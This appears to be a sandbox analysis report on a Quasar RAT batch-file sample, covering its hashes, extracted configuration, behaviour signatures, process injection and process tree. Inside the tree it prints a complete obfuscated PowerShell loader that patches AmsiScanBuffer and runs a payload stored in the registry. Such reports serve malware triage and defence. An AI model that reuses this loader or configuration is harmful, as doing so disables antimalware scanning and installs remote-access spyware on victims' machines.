quasar | 7fca260b4dbeac5ef0255577b3502e6658ca6661f80ad9583673f656c3e67a64

Analysis

max time kernel
37s
max time network
18s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
31-05-2024 22:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

$sxr-Uni2.bat
Size

796KB
MD5

03137a8d9aaa39d4266d6cafecc5ccb2
SHA1

65ab5f05615d7aeb12a8f64f2339af341172784d
SHA256

7fca260b4dbeac5ef0255577b3502e6658ca6661f80ad9583673f656c3e67a64
SHA512

a950fe4fcee799aec313c08dc93535f0af463ab3953fb054288230ed30099ff98de5e12a6485e35a11a90a1f41c3043f5270274d29de7ed25c98356015084226
SSDEEP

12288:sJOiyoo1m8Y8HvatsI8a0XNQ7UCPWa/9SC+KSXs+kYWjJ4rT+/mq6z4Q4uatxyG:sciyK8YzJ8BwUCPTwC+KysEWjG+D6l4b

Score

10^/10

quasar slave execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

127.0.0.1:4782

Mutex

$Sxr-mRtuuIZppUEbmX171W

Attributes

encryption_key
s5xN6p335pnxD0WJMnnQ
install_name
$sxr-powershell.exe
log_directory
$sxr-Logs
reconnect_delay
3000
startup_key
Powershell
subdirectory
$sxr-seroxen2

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral3/memory/2960-80-0x0000000007CC0000-0x0000000007D2C000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 4356 created 636 4356 powershell.EXE winlogon.exe
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

2 2960 powershell.exe
3 2960 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

488 powershell.exe
4924 powershell.exe
2960 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

ResetSurvival.exeInstall.exe

pid process

1704 ResetSurvival.exe
1624 Install.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com

description	pid	process	target process
PID 4356 created 636	4356	powershell.EXE	winlogon.exe

flow	pid	process
2	2960	powershell.exe
3	2960	powershell.exe

pid	process
1704	ResetSurvival.exe
1624	Install.exe

flow	ioc
1	ip-api.com

Drops file in System32 directory 4 IoCs

Processes:

powershell.EXEsvchost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 4356 set thread context of 1848 4356 powershell.EXE dllhost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	process	target process
PID 4356 set thread context of 1848	4356	powershell.EXE	dllhost.exe

Modifies data under HKEY_USERS 41 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXEdllhost.exe

pid	process
488	powershell.exe
488	powershell.exe
4924	powershell.exe
4924	powershell.exe
2960	powershell.exe
2960	powershell.exe
4356	powershell.EXE
4356	powershell.EXE
4356	powershell.EXE
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe
1848	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	488	powershell.exe
Token: SeDebugPrivilege	4924	powershell.exe
Token: SeIncreaseQuotaPrivilege	4924	powershell.exe
Token: SeSecurityPrivilege	4924	powershell.exe
Token: SeTakeOwnershipPrivilege	4924	powershell.exe
Token: SeLoadDriverPrivilege	4924	powershell.exe
Token: SeSystemProfilePrivilege	4924	powershell.exe
Token: SeSystemtimePrivilege	4924	powershell.exe
Token: SeProfSingleProcessPrivilege	4924	powershell.exe
Token: SeIncBasePriorityPrivilege	4924	powershell.exe
Token: SeCreatePagefilePrivilege	4924	powershell.exe
Token: SeBackupPrivilege	4924	powershell.exe
Token: SeRestorePrivilege	4924	powershell.exe
Token: SeShutdownPrivilege	4924	powershell.exe
Token: SeDebugPrivilege	4924	powershell.exe
Token: SeSystemEnvironmentPrivilege	4924	powershell.exe
Token: SeRemoteShutdownPrivilege	4924	powershell.exe
Token: SeUndockPrivilege	4924	powershell.exe
Token: SeManageVolumePrivilege	4924	powershell.exe
Token: 33	4924	powershell.exe
Token: 34	4924	powershell.exe
Token: 35	4924	powershell.exe
Token: 36	4924	powershell.exe
Token: SeIncreaseQuotaPrivilege	4924	powershell.exe
Token: SeSecurityPrivilege	4924	powershell.exe
Token: SeTakeOwnershipPrivilege	4924	powershell.exe
Token: SeLoadDriverPrivilege	4924	powershell.exe
Token: SeSystemProfilePrivilege	4924	powershell.exe
Token: SeSystemtimePrivilege	4924	powershell.exe
Token: SeProfSingleProcessPrivilege	4924	powershell.exe
Token: SeIncBasePriorityPrivilege	4924	powershell.exe
Token: SeCreatePagefilePrivilege	4924	powershell.exe
Token: SeBackupPrivilege	4924	powershell.exe
Token: SeRestorePrivilege	4924	powershell.exe
Token: SeShutdownPrivilege	4924	powershell.exe
Token: SeDebugPrivilege	4924	powershell.exe
Token: SeSystemEnvironmentPrivilege	4924	powershell.exe
Token: SeRemoteShutdownPrivilege	4924	powershell.exe
Token: SeUndockPrivilege	4924	powershell.exe
Token: SeManageVolumePrivilege	4924	powershell.exe
Token: 33	4924	powershell.exe
Token: 34	4924	powershell.exe
Token: 35	4924	powershell.exe
Token: 36	4924	powershell.exe
Token: SeIncreaseQuotaPrivilege	4924	powershell.exe
Token: SeSecurityPrivilege	4924	powershell.exe
Token: SeTakeOwnershipPrivilege	4924	powershell.exe
Token: SeLoadDriverPrivilege	4924	powershell.exe
Token: SeSystemProfilePrivilege	4924	powershell.exe
Token: SeSystemtimePrivilege	4924	powershell.exe
Token: SeProfSingleProcessPrivilege	4924	powershell.exe
Token: SeIncBasePriorityPrivilege	4924	powershell.exe
Token: SeCreatePagefilePrivilege	4924	powershell.exe
Token: SeBackupPrivilege	4924	powershell.exe
Token: SeRestorePrivilege	4924	powershell.exe
Token: SeShutdownPrivilege	4924	powershell.exe
Token: SeDebugPrivilege	4924	powershell.exe
Token: SeSystemEnvironmentPrivilege	4924	powershell.exe
Token: SeRemoteShutdownPrivilege	4924	powershell.exe
Token: SeUndockPrivilege	4924	powershell.exe
Token: SeManageVolumePrivilege	4924	powershell.exe
Token: 33	4924	powershell.exe
Token: 34	4924	powershell.exe
Token: 35	4924	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

powershell.exe

pid process

2960 powershell.exe

pid	process
2960	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exepowershell.EXEdllhost.exe

description	pid	process	target process
PID 3000 wrote to memory of 488	3000	cmd.exe	powershell.exe
PID 3000 wrote to memory of 488	3000	cmd.exe	powershell.exe
PID 3000 wrote to memory of 488	3000	cmd.exe	powershell.exe
PID 488 wrote to memory of 4924	488	powershell.exe	powershell.exe
PID 488 wrote to memory of 4924	488	powershell.exe	powershell.exe
PID 488 wrote to memory of 4924	488	powershell.exe	powershell.exe
PID 488 wrote to memory of 1204	488	powershell.exe	WScript.exe
PID 488 wrote to memory of 1204	488	powershell.exe	WScript.exe
PID 488 wrote to memory of 1204	488	powershell.exe	WScript.exe
PID 1204 wrote to memory of 5008	1204	WScript.exe	cmd.exe
PID 1204 wrote to memory of 5008	1204	WScript.exe	cmd.exe
PID 1204 wrote to memory of 5008	1204	WScript.exe	cmd.exe
PID 5008 wrote to memory of 2960	5008	cmd.exe	powershell.exe
PID 5008 wrote to memory of 2960	5008	cmd.exe	powershell.exe
PID 5008 wrote to memory of 2960	5008	cmd.exe	powershell.exe
PID 2960 wrote to memory of 1704	2960	powershell.exe	ResetSurvival.exe
PID 2960 wrote to memory of 1704	2960	powershell.exe	ResetSurvival.exe
PID 2960 wrote to memory of 1624	2960	powershell.exe	Install.exe
PID 2960 wrote to memory of 1624	2960	powershell.exe	Install.exe
PID 2960 wrote to memory of 1624	2960	powershell.exe	Install.exe
PID 4356 wrote to memory of 1848	4356	powershell.EXE	dllhost.exe
PID 4356 wrote to memory of 1848	4356	powershell.EXE	dllhost.exe
PID 4356 wrote to memory of 1848	4356	powershell.EXE	dllhost.exe
PID 4356 wrote to memory of 1848	4356	powershell.EXE	dllhost.exe
PID 4356 wrote to memory of 1848	4356	powershell.EXE	dllhost.exe
PID 4356 wrote to memory of 1848	4356	powershell.EXE	dllhost.exe
PID 4356 wrote to memory of 1848	4356	powershell.EXE	dllhost.exe
PID 4356 wrote to memory of 1848	4356	powershell.EXE	dllhost.exe
PID 1848 wrote to memory of 636	1848	dllhost.exe	winlogon.exe
PID 1848 wrote to memory of 688	1848	dllhost.exe	lsass.exe
PID 1848 wrote to memory of 992	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 464	1848	dllhost.exe	dwm.exe
PID 1848 wrote to memory of 432	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 768	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 1040	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 1128	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 1136	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 1152	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 1232	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 1280	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 1428	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 1436	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 1496	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 1600	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 1616	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 1640	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 1712	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 1804	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 1816	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 1924	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 2008	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 2028	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 1980	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 2052	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 2152	1848	dllhost.exe	spoolsv.exe
PID 1848 wrote to memory of 2280	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 2324	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 2480	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 2488	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 2496	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 2572	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 2592	1848	dllhost.exe	sysmon.exe
PID 1848 wrote to memory of 2668	1848	dllhost.exe	svchost.exe
PID 1848 wrote to memory of 2676	1848	dllhost.exe	svchost.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:636

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:464

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{e125f12a-97a3-4d1f-ab6d-34d6f4a559d1}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1848

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:432

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:768

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1136

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:eutbBasDxIpg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$LsrUAGXjddKRIA,[Parameter(Position=1)][Type]$oQcbgUzBAw)$PyJPQarBgeq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+[Char](102)+''+[Char](108)+''+'e'+'cte'+'d'+''+[Char](68)+''+'e'+''+'l'+''+'e'+''+[Char](103)+''+'a'+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+'dul'+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+'eT'+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+'l'+'a'+'s'+'s'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+','+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](65)+'ut'+[Char](111)+''+[Char](67)+'la'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$PyJPQarBgeq.DefineConstructor('R'+'T'+''+[Char](83)+''+[Char](112)+'ec'+'i'+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+''+'H'+''+'i'+''+'d'+'eBy'+[Char](83)+''+'i'+''+'g'+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$LsrUAGXjddKRIA).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'me'+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+'e'+''+[Char](100)+'');$PyJPQarBgeq.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+'i'+'c'+','+'H'+''+[Char](105)+''+[Char](100)+''+'e'+'B'+'y'+''+[Char](83)+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+'e'+'w'+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+''+[Char](108)+'',$oQcbgUzBAw,$LsrUAGXjddKRIA).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+'tim'+'e'+','+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $PyJPQarBgeq.CreateType();}$XbVSPJfzXDNiw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+'s'+[Char](111)+''+[Char](102)+'t'+'.'+''+'W'+''+[Char](105)+'n3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+'a'+'f'+[Char](101)+''+'N'+''+'a'+''+'t'+''+[Char](105)+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+'d'+[Char](115)+'');$rhkBRSttKHdKGX=$XbVSPJfzXDNiw.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+'dre'+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('Pub'+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](116)+''+'a'+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XpjTPviZjPgTWkdXLIb=eutbBasDxIpg @([String])([IntPtr]);$NpofykbEPOUJKppSYcRonU=eutbBasDxIpg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SyokotPEHDM=$XbVSPJfzXDNiw.GetMethod('G'+[Char](101)+''+[Char](116)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+''+'n'+''+[Char](101)+''+[Char](108)+''+'3'+'2.'+[Char](100)+''+[Char](108)+''+'l'+'')));$UIFwzJYPWdfOwo=$rhkBRSttKHdKGX.Invoke($Null,@([Object]$SyokotPEHDM,[Object](''+[Char](76)+''+'o'+''+'a'+''+[Char](100)+''+[Char](76)+'i'+[Char](98)+''+[Char](114)+'a'+'r'+'y'+[Char](65)+'')));$OWctXfbiEaPXdMEIr=$rhkBRSttKHdKGX.Invoke($Null,@([Object]$SyokotPEHDM,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+'o'+''+'t'+''+[Char](101)+''+'c'+'t')));$gTdKDGk=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UIFwzJYPWdfOwo,$XpjTPviZjPgTWkdXLIb).Invoke(''+'a'+''+'m'+''+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$ZhujpJvlqJFFcXVeb=$rhkBRSttKHdKGX.Invoke($Null,@([Object]$gTdKDGk,[Object](''+'A'+'m'+[Char](115)+'i'+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+'Bu'+[Char](102)+''+[Char](102)+''+[Char](101)+'r')));$PBucYIdVgS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OWctXfbiEaPXdMEIr,$NpofykbEPOUJKppSYcRonU).Invoke($ZhujpJvlqJFFcXVeb,[uint32]8,4,[ref]$PBucYIdVgS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ZhujpJvlqJFFcXVeb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OWctXfbiEaPXdMEIr,$NpofykbEPOUJKppSYcRonU).Invoke($ZhujpJvlqJFFcXVeb,[uint32]8,0x20,[ref]$PBucYIdVgS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+'W'+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](115)+''+[Char](120)+'r'+[Char](115)+'t'+'a'+'g'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1152

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1436

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:2976

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1600

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1616

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1640

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1712

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1816

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1924

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2028

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1980

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2052

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2152

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2280

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2324

C:\Windows\system32\svchost.exe
